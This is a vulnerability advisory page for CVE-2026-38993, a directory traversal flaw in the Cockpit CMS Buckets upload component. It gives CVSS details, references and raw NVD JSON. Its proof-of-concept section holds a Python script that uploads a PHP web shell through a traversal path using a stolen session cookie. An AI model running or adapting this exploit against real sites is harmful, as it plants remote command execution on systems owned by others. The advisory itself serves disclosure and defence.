CVE-2026-38993

Description

Cockpit 2.13.5 and earlier is vulnerable to directory traversal via the Buckets component. This vulnerability allows authenticated attackers to write files to arbitrary locations within the uploads directory or overwrite assets with malicious versions.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

No configuration data available.

Cockpit CMS <= 2.13.5

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target URL
url = "http://target.com/api/buckets/upload"

# Attacker's session cookie (authenticated user)
cookies = {
    "cockpit": "session_token_here"
}

# Malicious file content
files = {
    'file': ('shell.php', '<?php system($_GET["cmd"]); ?>', 'application/x-php')
}

# Payload exploiting directory traversal to write to webroot
data = {
    'path': '../../../tmp/uploads/shell.php' # Or path to overwrite an asset
}

response = requests.post(url, files=files, data=data, cookies=cookies)

if response.status_code == 200:
    print("[+] Exploit successful! File written.")
else:
    print("[-] Exploit failed.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-38993
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-38993
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-38993/
[4] VulDB https://vuldb.com/cve/CVE-2026-38993
[5] https://felsec.com/posts/cockpit-cms-2.13.5-multi-vulns/
[6] https://github.com/Cockpit-HQ/Cockpit/releases/tag/2.14.0
[7] https://felsec.com/posts/cockpit-cms-2.13.5-multi-vulns/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-38993", "sourceIdentifier": "[email protected]", "published": "2026-04-29T16:16:23.907", "lastModified": "2026-04-29T21:22:20.120", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cockpit 2.13.5 and earlier is vulnerable to directory traversal via the Buckets component. This vulnerability allows authenticated attackers to write files to arbitrary locations within the uploads directory or overwrite assets with malicious versions."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "references": [{"url": "https://felsec.com/posts/cockpit-cms-2.13.5-multi-vulns/", "source": "[email protected]"}, {"url": "https://github.com/Cockpit-HQ/Cockpit/releases/tag/2.14.0", "source": "[email protected]"}, {"url": "https://felsec.com/posts/cockpit-cms-2.13.5-multi-vulns/", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}